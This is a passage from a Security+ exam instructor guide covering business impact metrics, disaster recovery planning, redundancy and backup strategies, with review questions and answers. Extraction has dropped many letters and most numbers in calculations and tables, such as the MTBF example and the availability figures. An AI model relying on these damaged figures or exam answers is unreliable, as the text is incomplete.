when undertaken by a government agency, rather than a business.

Show Slide(s) Mission Essential Functions

Mission Essential
A mission essential function (MEF) is one that cannot be deferred. This means
Functions that the organi ation must be able to perform the function as close to continually as
possible, and if there is any service disruption, the mission essential functions must be
Teaching restored first.
Tip
Students need to learn unctions that act as support for the business or an E but are not critical in themselves
these metrics. are referred to as primary business functions (P ).

Analysis of mission essential functions is generally governed by four main metrics

• Maximum tolerable downtime (MTD) is the longest period of time that a
business function outage may occur for without causing irrecoverable business
failure. ach business process can have its own MTD, such as a range of minutes

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 509

to hours for critical functions, hours for urgent functions, seven days for normal
functions, and so on. MTDs vary by company and event. ach function may be
supported by multiple systems and assets. The MTD sets the upper limit on the
amount of recovery time that system and asset owners have to resume operations.
or e ample, an organi ation speciali ing in medical e uipment may be able to
e ist without incoming manufacturing supplies for three months because it has
stockpiled a si able inventory. After three months, the organi ation will not have
sufficient supplies and may not be able to manufacture additional products,
therefore leading to failure. In this case, the MTD is three months.

• Recovery time objective (RTO) is the period following a disaster that an individual
IT system may remain o ine. This represents the amount of time it takes to identify
that there is a problem and then perform recovery (restore from backup or switch
in an alternative system, for instance .

• ork ecovery Time T . ollowing systems recovery, there may be additional

work to reintegrate di erent systems, test overall functionality, and brief system
users on any changes or di erent working practices so that the business function is
again fully supported.

TO+ T must not exceed T

• Recovery Point Objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an of
hours means that the data can be recovered from a backup copy to a point not
more than 24 hours before the database was infected.

etrics governing mission essential functions. (Images 1 .com.)

or e ample, a customer leads database might be able to sustain the loss of a few
hours' or days' worth of data the salespeople will generally be able to remember
who they have contacted and rekey the data manually . Conversely, order processing
may be considered more critical, as any loss will represent lost orders and it may be
impossible to recapture web orders or other processes initiated only through the
computer system, such as linked records to accounting and fulfillment.
MTD and help to determine which business functions are critical and also to
specify appropriate risk countermeasures. or e ample, if your is measured in

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 510 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

days, then a simple tape backup system should suffice if is ero or measured in
minutes or seconds, a more expensive server cluster backup and redundancy solution
will be re uired.

Show Slide(s) Identification o Critical stems

Identification of
To support the resiliency of mission essential and primary business functions, it
Critical ystems is crucial to perform an identification of critical systems. This means compiling an
inventory of business processes and the assets that support them. Asset types include:
• eople employees, visitors, and suppliers .
• Tangible assets buildings, furniture, e uipment and machinery plant , ICT
e uipment, electronic data files, and paper documents .
• Intangible assets ideas, commercial reputation, brand, and so on .
• rocedures supply chains, critical procedures, standard operating procedures .

For mission essential functions, it is important to reduce the number of dependencies

between components. Dependencies are identified by performing a business process
analysis A for each function. The A should identify the following factors
• Inputs the sources of information for performing the function including the
impact if these are delayed or out of se uence .
• ardware the particular server or data center that performs the processing.
• ta and other resources supporting the function.
• utputs the data or resources produced by the function.
• rocess ow a step by step description of how the function is performed.

Show Slide(s) Single Points of Failure

ingle oints of ailure
ach IT system will be supported by hardware assets, such as servers, disk arrays,
switches, routers, and so on. educing dependencies means the system design can
Teaching more easily eliminate the sort of weakness that comes from these devices becoming
Tip single points of failure (SPoF). A o is an asset that causes the entire work ow to
fail if it is damaged or otherwise not available. o s can be mitigated by provisioning
Students need to
learn the use of these redundant components. Metrics for asset reliability can help to determine when and
metrics. how much redundancy is re uired. ome of the main Is relating to service availability
are as follows:
• Mean time to failure (MTTF) and mean time between failures (MTBF) represent
the e pected lifetime of a product. MTT should be used for non repairable assets.
or e ample, a hard drive may be described with an MTT , while a server which
could be repaired by replacing the hard drive would be described with an MT .
ou will often see MT used indiscriminately, however. or most devices, failure is
more likely early or late in life, producing the so called bathtub curve.

MTT MT can be used to determine the amount of asset redundancy a system

should have. A redundant system can failover to another asset if there is a fault and
continue to operate normally. It can also be used to work out how likely failures are
to occur.

• The calculation for MT is the total time divided by the number of failures. or
e ample, if you have devices that run for hours and two of them fail, the
MT is hours failure .

• The calculation for MTT for the same test is the total time divided by the
number of devices, so , with the result being hours failure.

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 511

• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to replace or recover. This metric is important in determining the overall
recovery time ob ective T .

IST has published a guide to resiliency and IT contingency planning (SP 00- ), available
at nvlpubs.nist.gov nistpubs egacy SP nistspecialpublication 00- r1.pdf.

Disasters Show Slide(s)

In terms of business continuity, a disaster is an event that could threaten mission Disasters
essential functions. For example, a privacy breach is a critical incident, but it is probably
not a direct threat to business functions. An earth uake that destroys a data center
is a disaster level event. Disaster response involves many of the same principles and
procedures as incident response, but at a larger scale.

Internal versus External

An internal disaster is one that is caused by malicious activity or by accident by an
employee or contractor anyone or anything whose presence within the company or
organi ation has been authori ed. Internal disaster also encompasses system faults,
such as wiring causing a fire. Conversely, e ternal disaster events are caused by threat
actors who have no privileged access. ternal disaster includes disasters that have
an impact on the organi ation through wider environmental or social impacts, such as
disruption of public services or impacts to the supply chain.

Person-Made
A person made disaster event is one where human agency is the primary cause.
Typical e amples other than devastating cybersecurity incidents include terrorism, war,
vandalism, pollution, and arson. There can also be accidental person made disasters,
such as cutting through power or telecoms cabling.

Environmental
An environmental disaster, or natural disaster, is one that could not be prevented
through human agency. nvironmental disasters include river or sea oods,
earth uakes, storms, disease, and so on. Natural disasters may be uite predictable
as is the case with areas prone to ooding or storm damage or une pected, and
therefore difficult to plan for.

ost natural or environmental disasters can also have a human or artificial source. or
example, ooding might be more likely because dams are not ade uately maintained a
wildfire could be the result of arson or poorly maintained power infrastructure.

Site Risk Assessment

here cybersecurity generally has financial impacts, site safety can have impacts to life
and property. A site risk assessment evaluates e posure to the following types of factor
• isk from disaster events, such as earth uake, ood, and fire. These events can
occur naturally or from person made causes.

• isk from disruption to utilities, such as electricity, water, and transportation. These
risks are higher in geographically isolated sites.

• isk to health and safety from on premises electromechanical systems or chemicals.

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 512 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Disaster Recovery Plans

Disaster ecovery
Disaster recovery plans (DRPs) describe the specific procedures to follow to recover
Plans a system or site to a working state following a disaster level event. The D should
accomplish the following
1. Identify scenarios for natural and non natural disaster and options for protecting
systems. Plans need to account for risk (a combination of the likelihood the
disaster will occur and the possible impact on the organi ation and cost.

There is no point implementing disaster recovery plans that financially cripple

the organi ation. The business case is made by comparing the cost of recovery
measures against the cost of downtime. The recovery plan should not generally
exceed the downtime cost.

2. Identify tasks, resources, and responsibilities for responding to a disaster.

• ho is responsible for doing what ow can they be contacted hat happens

if they are not available

• hich functions are most critical here should e ort first be concentrated

• hat resources are available hould they be pre purchased and held in stock
ill the disaster a ect availability of supplies

• hat are the timescales for resumption of normal operations

3. Train sta in the disaster planning procedures and how to react well to change.

As well as restoring systems, the disaster recovery plan should identify stakeholders
who need to be informed about incidents with impacts to life and safety. There may
be a legal re uirement to inform the police, fire service, or building inspectors about
any safety related or criminal incidents. If third party or personal data is lost or stolen,
the data sub ects may need to be informed. If the disaster a ects services, customers
need to be informed about the time to fi and any alternative arrangements that can
be made.

Show Slide(s) Functional Recovery Plans

Functional Recovery
ecause disasters are e treme and hopefully rare events, it is very difficult to evaluate
Plans how e ective or functional a recovery plan is. There are four principal methods for
assessing the functionality of recovery plans
• alk throughs, workshops, and orientation seminars often used to provide basic
awareness and training for disaster recovery team members, these e ercises
describe the contents of D s, and other plans, and the roles and responsibilities
outlined in those plans.

• Tabletop e ercises sta ghost the same procedures as they would in a disaster,
without actually creating disaster conditions or applying or changing anything.
These are simple to set up but do not provide any sort of practical evidence of
things that could go wrong, time to complete, and so on.

• unctional e ercises action based sessions where employees can validate D s by

performing scenario based activities in a simulated environment.

• ull scale e ercises action based sessions that re ect real situations, these
e ercises are held onsite and use real e uipment and real personnel as much as
possible. ull scale e ercises are often conducted by public agencies, but local
organi ations might be asked to participate.

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 513

e ie Acti ity
usiness Impact Analysis oncepts
Answer the following uestions

1. What factor is most likely to reduce a system's resiliency?

ingle points of failure.

2. True or false? RTO expresses the amount of time required to identify and
resolve a problem within a single system or asset.

True.

3. What is measured by MTBF?

Mean time between failures MT represents the e pected reliability of a product

over its lifetime.

4. What is a tabletop exercise?

A discussion based drill of emergency response procedures. ta may role play and
discuss their responses but actual emergency conditions are not simulated.

5. Why are exercises an important part of creating a disaster recovery plan?

ull scale or functional e ercises can identify mistakes in the plan that might not be
apparent when drafting procedures. It also helps to familiari e sta with the plan.

esson 1 Summarizing isk anagement Concepts | Topic 1

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 514 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 19
Summary
Teaching ou should be able e plain risk management, business impact analysis, and disaster
Tip recovery planning processes and metrics.
Check that students
are confident about
the content that has
Guidelines for Risk Management
been covered. If there ollow these guidelines for supporting risk management assessment
is time, revisit any
content examples that • Analy e work ows to determine M s and s and the assets that support them,
they have uestions using metrics such as MTT MT and MTT .
about. If you have
used all the available • Identify threat and disaster scenarios, accounting for internal versus e ternal,
time for this lesson
environmental, person made, site specific risk assessment, multiparty, software
block, note the issues,
and schedule time for licensing compliance, I theft, and legacy systems.
a review later in the
course. • rioriti ing M s, perform business impact analysis to determine inherent risk
likelihood and impacts for di erent threat and disaster scenarios, using metrics
such as L , A , and AL .

• Define MTD, T , and for each function and or critical system and apply a risk
remediation techni ue mitigation, transference, avoidance, or acceptance that
meets these targets.

• ummari e risk factors and countermeasures for stakeholders in a risk register

using heat maps for easy interpretation.

• erform ongoing risk monitoring to determine residual risk and control risk.

• stablish and test functional D s to enable e ective response to disaster

level events.

esson 1 Summarizing isk anagement Concepts

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 20
Implementing Cybersecurity Resilience

LESSON INTRODUCTION Teaching

Tip
Cybersecurity resilience means that even successful intrusions by threat actors have This lesson focuses
limited impact on confidentiality, integrity, and availability. rovisioning redundancy in on the "recover"
storage, power, and network systems, plus e ective backup procedures, site resiliency, function, covering
and e ective procedures for change control and configuration management are crucial topics such as
in maintaining high availability. redundancy, backup,
and configuration
management.
Lesson Objectives
In this lesson, you will
• Implement redundancy strategies.

• Implement backup strategies.

• Implement cybersecurity resiliency strategies.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 516 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 20A
Implement Redundancy Strategies

Teaching EXAM OBJECTIVES COVERED

Tip 2.5 Given a scenario, implement cybersecurity resilience
This topic starts the
coverage of ob ective
. by looking at
The output of risk assessments and business impact analysis will identify vulnerable
power, network, and
storage redundancy. business processes. To reduce risks in these processes, you can make the IT systems
This content should
and other business systems that support them resilient to failure. ou must be able
be uite familiar to install and configure the systems that provide redundancy for power supply,
to students from networking, and storage systems.
Network , so you
should not need to
spend too much time High Availability
on it.
ne of the key properties of a resilient system is high availability. Availability is
Show Slide(s) the percentage of time that the system is online, measured over the defined period,
typically one year. The corollary of availability is downtime, or the amount of time
igh Availability for which the system is unavailable. The ma imum tolerable downtime MTD metric
e presses the availability re uirement for a particular business function. igh
availability is usually loosely described as hours per day, days per week or
hours per day, days per year . or a critical system, availability will be
described as two nines up to five or si nines .

Availability Annual Downtime (hh:mm:ss)

.
.
.
.

Downtime is calculated from the sum of scheduled service intervals plus unplanned outages over
the period.

System availability can refer to an overall process, but also to availability at the level of a
server or individual component.

Scalability and Elasticity

igh availability also means that a system is able to cope with rapid growth in demand.
These properties are referred to as scalability and elasticity. calability is the capacity to
increase resources to meet demand within similar cost ratios. This means that if service
demand doubles, costs do not more than double. There are two types of scalability
• To scale out is to add more resources in parallel with e isting resources.

• To scale up is to increase the power of e isting resources.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 517

lasticity refers to the system's ability to handle these changes on demand in real
time. A system with high elasticity will not e perience loss of service or performance if
demand suddenly increases rapidly.

ault Tolerance and edundanc

A system that can e perience failures and continue to provide the same or nearly the
same level of service is said to be fault tolerant. ault tolerance is often achieved
by provisioning redundancy for critical components and single points of failure. A
redundant component is one that is not essential to the normal function of a system
but that allows the system to recover from the failure of another component.

Power Redundancy Show Slide(s)

All types of computer systems re uire a stable power supply to operate. lectrical ower edundancy
events, such as voltage spikes or surges, can crash computers and network appliances,
while loss of power from brownouts or blackouts will cause e uipment to fail. ower
management means deploying systems to ensure that e uipment is protected against
these events and that network operations can either continue uninterrupted or be
recovered uickly.

ual o er upplies
An enterprise class server or appliance enclosure is likely to feature two or more power
supply units s for redundancy. A hot plug can be replaced in the event of
failure without powering down the system.

Managed Power Distribution Units (PDUs)

The power circuits supplying grid power to a rack, network closet, or server room
must be enough to meet the load capacity of all the installed e uipment, plus room
for growth. Conse uently, circuits to a server room will typically be higher capacity
than domestic or office circuits or amps as opposed to amps, for instance .
These circuits may be run through a power distribution unit (PDU). These come with
circuitry to clean the power signal, provide protection against spikes, surges, and
brownouts, and can integrate with uninterruptible power supplies s . Managed
D s support remote power monitoring functions, such as reporting load and
status, switching power to a socket on and o , or switching sockets on in a particular
se uence.

Battery Backups and Uninterruptible Power Supplies (UPSs)

If there is loss of power, system operation can be sustained for a few minutes or hours
depending on load using battery backup. attery backup can be provisioned at the
component level for disk drives and AID arrays. The battery protects any read or write
operations cached at the time of power loss. At the system level, an uninterruptible
power supply (UPS) will provide a temporary power source in the event of a blackout
complete power loss . This may range from a few minutes for a desktop rated model
to hours for an enterprise system. In its simplest form, a comprises a bank of
batteries and their charging circuit plus an inverter to generate AC voltage from the DC
voltage supplied by the batteries.
The time allowed by a should be sufficient to failover to an alternative power
source, such as a standby generator. If there is no secondary power source, will at
least allow the administrator to shut down the server or appliance properly users can
save files, and the can complete the proper shut down routines.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 518 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Generators
A backup power generator can provide power to the whole building, often for several
days. Most generators use diesel, propane, or natural gas as a fuel source. ith diesel
and propane, the main drawback is safe storage diesel also has a shelf life of between
months and two years with natural gas, the issue is the reliability of the gas
supply in the event of a natural disaster. Data centers are also investing in renewable
power sources, such as solar, wind, geothermal, hydrogen fuel cells, and hydro. The
ability to use renewable power is a strong factor in determining the best site for new
data centers. Large scale battery solutions, such as Tesla's owerpack tesla.com
powerpack , may be able to provide an alternative to backup power generators. There
are also emerging technologies to use all the battery resources of a data center as a
microgrid for power storage scientificamerican.com article how big batteries at data
centers could replace power plants .

A UPS is always required to protect against any interruption to computer services. A backup
generator cannot be brought online fast enough to respond to a power failure.

Show Slide(s) Network Redundancy

Network edundancy
Networking is another critical resource where the a single point of failure could cause
significant service disruption.

Network Interface Card (NIC) Teaming

Network interface card NIC teaming, or adapter teaming, means that the server
is installed with multiple NICs, or NICs with multiple ports, or both. ach port is
connected to separate network cabling. During normal operation, this can provide a
high bandwidth link. or e ample, four ports gives an overall bandwidth of .
If there is a problem with one cable, or one NIC, the network connection will continue
to work, though at ust .

For the system to be fault tolerant, the higher bandwidth must not be critical to the function.

Switching and Routing

Network cabling should be designed to allow for multiple paths between the various
switches and routers, so that during a failure of one part of the network, the rest
remains operational.

Multiple switching paths require use of Spanning Tree Protocol (STP) to prevent loops.

Load Balancers
NIC teaming provides load balancing at the adapter level. Load balancing and
clustering can also be provisioned at a service level
• A load balancing switch distributes workloads between available servers.

• A load balancing cluster enables multiple redundant servers to share data and
session information to maintain a consistent service if there is failover from one
server to another.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 519

Disk Redundancy Show Slide(s)

Disk and storage resources are critically dependent on redundancy. hile backup provides Disk edundancy
integrity for when a disk fails, to restore from backup would re uire installing a new
storage unit, restoring the data, and testing the system configuration. Disk redundancy
ensures that a server can continue to operate if one, or possibly more, storage devices fail.

Redundant Array of Independent Disks (RAID)

hen a storage system is configured as a Redundant Array of Independent Disks
(RAID), many disks can act as backups for each other to increase reliability and fault
tolerance. If one disk fails, the data is not lost, and the server can keep functioning.
The AID advisory board defines AID levels, numbered from to , where each level
corresponds to a specific type of fault tolerance. There are also proprietary and nested
AID solutions. ome of the most commonly implemented types of AID are listed in
the following table.

RAID Level Fault Tolerance

Level Mirroring means that data is written to two
disks simultaneously, providing redundancy
if one disk fails, there is a copy of data
on the other . The main drawback is that
storage efficiency is only .
Level triping with parity means that data is
written across three or more disks, but
additional information parity is calculated.
This allows the volume to continue if one
disk is lost. This solution has better storage
efficiency than AID .
Level Double parity, or level with an additional
parity stripe, allows the volume to continue
when two devices have been lost
Nested , , or Nesting AID sets generally improves
performance or redundancy. or e ample,
some nested AID solutions can support the
failure of more than one disk.

RAID level 0 refers to striping without parity. Data is written in blocks across several disks
simultaneously, but with no redundancy. This can improve performance, but if one disk
fails, so does the whole volume, and data on it will be corrupted. There are some use cases
for RAID 0, but typically striping without parity is only implemented to improve performance
in a nested RAID solution.

Multipath
here AID provides redundancy for the storage devices, multipath is focused on
the bus between the server and the storage devices or AID array. A storage system is
accessed via some type of controller. The controller might be connected to disk units
locally installed in a server, or it might connect to storage devices within a storage area
network AN . Multipath input ouput I ensures that there is controller redundancy
and or multiple network paths to the storage devices.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 520 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Geographical Redundancy and Replication

eographical
Data replication is technology that maintains e act copies of data at more than one
edundancy and location. AID mirroring and parity implement types of replication between local
eplication storage devices. Data replication can be applied in many other conte ts
• torage Area Network AN most enterprise storage is configured as a AN. A
AN is a high speed fiber optic network of storage devices built from technologies
such as ibre Channel, mall Computer ystem Interface C I , or Infini and.
edundancy can be provided within the AN, and replication can also take place
between ANs using AN links.

• Database much data is stored within a database. here a database is replicated

between multiple servers or sites, it is very important to maintain consistency
between the replicas. Database management systems come with specific tools to
implement di erent kinds of replication.

• irtual Machine M the same M instance may need to be deployed in multiple

locations. This can be achieved by replicating the M's disk image and configuration
settings.

Geographical Dispersal
Geographical dispersal refers to data replicating hot and warm sites that are
physically distant from one another. This means that data is protected against a
natural disaster wiping out storage at one of the sites. This is also described as a geo
redundant solution.

Asynchronous and Synchronous Replication

ynchronous replication is designed to write data to all replicas simultaneously.
Therefore, all replicas should always have the same data all of the time. Asynchronous
replication writes data to the primary storage first, and then copies data to the replicas
at scheduled intervals.
Asynchronous replication isn't a good choice for a solution that re uires data in
multiple locations to be consistent, such as data from product inventory lists accessed
in di erent regions. Many geo redundant replication services rely on asynchronous
replication due to the distances between data centers in multiple regions. In some
cases, business solutions work around the limitations of asynchronous replication. or
e ample, an online retailer may choose only to show inventory from their local regional
warehouse.

On-Premises versus Cloud

igh availability through redundancy and replication is resource intensive, especially
when configuring multiple hot or warm sites. or on premises sites, provisioning the
storage devices and high bandwidth, low latency AN links re uired between two
geographically dispersed hot sites could incur una ordable costs. This cost is one of the
big drivers of cloud services, where local and geographic redundancy are built into the
system, if you trust the C to operate the cloud e ectively. or e ample, in the cloud,
geo redundancy replicates data or services between data centers physically located
in two di erent regions. Disasters that occur at the regional level, like earth uakes,
hurricanes, or oods, should not impact availability across multiple ones.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 521

Review Activity:
Redundancy Strategies
Answer the following uestions

1. How does MTD relate to availability?

The ma imum tolerable downtime MTD metric e presses the availability re uirement
for a particular business function.

2. o does elasticit di er rom scala ilit

A scalable system is one that responds to increased workloads by adding resources

without e ponentially increasing costs. An elastic system is able to assign or unassign
resources as needed to match either an increased workload or a decreased workload.

3. Which two components are required to ensure power redundancy for a

blackout period extending over 24 hours?

An uninterruptible power supply is re uired to provide failover for the initial

blackout event, before switching over to a standby generator to supply power over a
longer period.

4. How does RAID support fault tolerance?

Aside from AID , AID provides redundancy between a group of disks, so that if one
disk were to fail, that data may be recoverable from the other disks in the array.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 522 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 20B
Implement Backup Strategies

Teaching EXAM OBJECTIVES COVERED

Tip 2.5 Given a scenario, implement cybersecurity resilience
hile this is a critical
area of content, it
should be possible
to summari e
No cybersecurity program is complete without an e ective and tested system for
uickly. ocus on backing up and restoring critical data and system configurations. As a security
distinguishing professional, you need to be able to select appropriate backup types and media for
incremental and di erent scenarios and e plain how nonpersistence can achieve more secure system
di erential and configurations, as well as maintaining high availability.
discuss order of
restoration.

Show Slide(s)
Backups and Retention Policy
very business continuity and disaster recovery plan makes use of backups, of one
ackups and type or another. The e ecution and fre uency of backups must be carefully planned
etention olicy and guided by policies. Data retention needs to be considered in the short and long
term
• In the short term, files that change fre uently might need retaining for version
control. hort term retention is also important in recovering from malware
infection. Consider the scenario where a backup is made on Monday, a file is
infected with a virus on Tuesday, and when that file is backed up later on Tuesday,
the copy made on Monday is overwritten. This means that there is no good means
of restoring the uninfected version of the file. hort term retention is determined by
how often the youngest media sets are overwritten.

• In the long term, data may need to be stored to meet legal re uirements or to
comply with company policies or industry standards. Any data that must be retained
in a particular version past the oldest sets should be moved to archive storage.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 523

Performing a backup using Acronis Backup. (Screenshot used with permission from Acronis.)

or these reasons, backups are kept back to certain points in time. As backups take up
a lot of space, and there is never limitless storage capacity, this introduces the need for
storage management routines to reduce the amount of data occupying backup storage
media while giving ade uate coverage of the re uired recovery window. The recovery
window is determined by the recovery point ob ective , which is determined
through business continuity planning. Advanced backup software can prevent media
sets from being overwritten in line with the specified retention policy.

acking up a domain controller using Acronis backup The ow ong to eep field specifies the
retention period. (Screenshot used with permission from Acronis.)

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 524 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Backup Types

ackup Types
tilities that support enterprise backup operations come with features to support
retention policies and media rotation. hen considering a backup made against an
Teaching original copy of data, the backup can usually be performed using one of three main
Tip types full, incremental, and di erential. In indows, a full backup includes all selected
tudents need to files and directories while incremental and di erential backups check the status of the
understand the archive attribute before including a file. The archive attribute is set whenever a file is
distinction between modified. This allows backup software to determine which files have been changed and
incremental and therefore need to be copied.
di erential backups.

inux doesn t support a file archive attribute. Instead, a date stamp is used to determine
whether the file has changed.

ull Incremental and i erential ac up T pes

The following table summari es the three di erent backup types.

Backup/Restore
Type Data Selection Archive Attribute
Time
ull All selected data igh low one tape Cleared
regardless of when set
it was previously
backed up
Incremental New files, as well as Low high multiple Cleared
files modified since tape sets
the last backup
Di erential All new and modi Moderate moderate Not Cleared
fied files since the no more than two
last full backup sets

ifferential and incremental backup and restore operations.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 525

The factors that determine which method to use are the time it takes to restore versus
the time it takes to back up. Assuming a backup is performed every working day, an
incremental backup only includes files changed during that day, while a di erential
backup includes all files changed since the last full backup. Incremental backups save
backup time but can be more time consuming when the system must be restored. The
system must be restored from the last full backup set and then from each incremental
backup that has subse uently occurred. A di erential backup system only involves two
tape sets when restoration is re uired.

o not combine differential and incremental backups. Use full backups interspersed with
differential backups or full backups interspersed with incremental backups.

Copy Backups
Most software also has the capability to do copy backups. These are made outside the
tape rotation system and do not a ect the archive attribute.

Snapshots and Images Show Slide(s)

napshots are a means of getting around the problem of open files. If the data that napshots and Images
you're considering backing up is part of a database, such as L data or an change
messaging system, then the data is probably being used all the time. ften copy based
mechanisms will be unable to back up open files. hort of closing the files, and so too
the database, a copy based system will not work. A snapshot is a point in time copy
of data maintained by the file system. A backup program can use the snapshot rather
than the live data to perform the backup. In indows, snapshots are provided for on
NT volumes by the Volume Shadow Copy Service (VSS). They are also supported on
un's file system, and under some enterprise distributions of Linu .

Configuring SS settings in Acronis ackup. (Screenshot used with permission from Acronis.)

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 526 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

irtual system managers can usually take snapshot or cloned copies of Ms. A
snapshot remains linked to the original M, while a clone becomes a separate M from
the point that the cloned image was made.
An image backup is made by duplicating an installation. This can be done either
from a physical hard disk or from a M's virtual hard disk. Imaging allows the system
to be redeployed uickly, without having to reinstall third party software, patches, and
configuration settings. A system image should generally not contain any user data files,
as these will uickly become out of date.

Show Slide(s) ac up tora e Issues

ackup torage Issues
acked up and archived data need to be stored as securely as live data. A data backup
has the same confidentiality and integrity re uirements as its source. It also has its
Teaching own availability re uirement. Typically, backup media is physically secured against
Tip theft or snooping by keeping it in a restricted part of the building, with other server
Make sure students and network e uipment. Many backup solutions use encryption to ensure data
can distinguish onsite confidentiality should the media be stolen.
o site and online
o ine. site tora e
Additionally, you must plan for events that could compromise both the live data and
the backup set. Natural disasters, such as fires, earth uakes, and oods, could leave
an organi ation without a data backup, unless they have kept a copy o site. Distance
consideration is a calculation of how far o site the backup needs to be kept, given
di erent disaster scenarios. n the one hand, the media must be kept far away enough
not to be damaged by the disaster on the other, media access should not slow down a
recovery operation too much.
ithout a network that can support the re uired bandwidth, the o site media must
be physically brought onsite and if there is no second set of o site media, data is
at substantial risk at this time , the latest backup performed, and then removed to
o site storage again. uite apart from the difficulty and e pense of doing this, there
are data confidentiality and security issues in transporting the data. In recent years,
high bandwidth Internet and high capacity cloud storage providers have made o site
backup solutions much more a ordable and easy to implement.

nline ersus ine ac ups

As well as the onsite o site consideration, you should also be aware of a distinction
between online and o ine backups. An online backup system is instantly available to
perform a backup or restore operation without an administrator having to transport
and connect a device or load some backup media. An o ine backup is disconnected
from the host and must be connected manually.
An online system is faster, but an o ine backup o ers better security. Consider the
case of cryptoransomware, for instance. If the backup system is connected to the
infected host, the ransomware will encrypt the backup, rendering it useless. ome
cryptoransomware is configured to try to access cloud accounts and encrypt the cloud
storage f secure.com v descs articles crypto ransomware.shtml .
Show Slide(s)
The 3-2-1 rule states that you should have three copies of your data, across two media
types, with one copy held o ine and offsite.
ackup Media Types

Teaching
Tip
These technologies Backup Media Types
should be familiar to
students from A and A backup operation can use several media types. ach type has advantages and
Network . disadvantages that make it more or less suitable for given scenarios.

Lesson 20: Implementing Cybersecurity Resilience | Topic 20B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 527

Disk
Individual removable hard drives are an e cellent low cost option for network
backups, but they do not have sufficient capacity or e ibility to be used within an
automated enterprise backup solution.

Network Attached Storage (NAS)

A network attached storage (NAS) appliance is a specially configured type of server
that makes AID storage available over common network protocols, such as indows
ile haring M or T . A NA appliance is accessed via an I address and backup
takes place at file level. A NA can be another good option for backup, but as
a single device, it provides no o site option. As it is normally kept online, it can be
vulnerable to cryptoransomware as well.

Tape
Digital tape systems are a popular choice for institutions with multi terabyte storage
re uirements. Tape is very cost e ective and, given a media rotation system, tapes can
be transported o site. The latest generation of tape will store about terabytes
per cartridge or up to about T with compression. The main drawback of tape is
that it is slow, compared to disk based solutions, especially for restore operations.

Storage Area Network (SAN) and Cloud

A AID array or tape drive autoloader can be provisioned as direct attached storage,
where a server hosts the backup devices, usually over serial attached SCSI (SAS).
Direct attached storage has limited scalability, so enterprise and cloud storage
solutions often use storage area networks (SAN) as a layer of abstraction between
the file system ob ects presented to servers and the configuration of the actual storage
media. here NA uses file level access to storage, a AN is based on block level
addressing. A AN can incorporate AID arrays and tape systems within the same
network. ANs can achieve o site storage through replication.

Restoration Order Show Slide(s)

If a site su ers an uncontrolled outage, in ideal circumstances processing will be estoration rder
switched to an alternate site and the outage can be resolved without any service
interruption. If an alternate processing site is not available, then the main site must be Teaching
brought back online as uickly as possible to minimi e service disruption. This does Tip
not mean that the process can be rushed, however. A comple facility such as a data ritish Airways' data
center or campus network must be reconstituted according to a carefully designed center problems
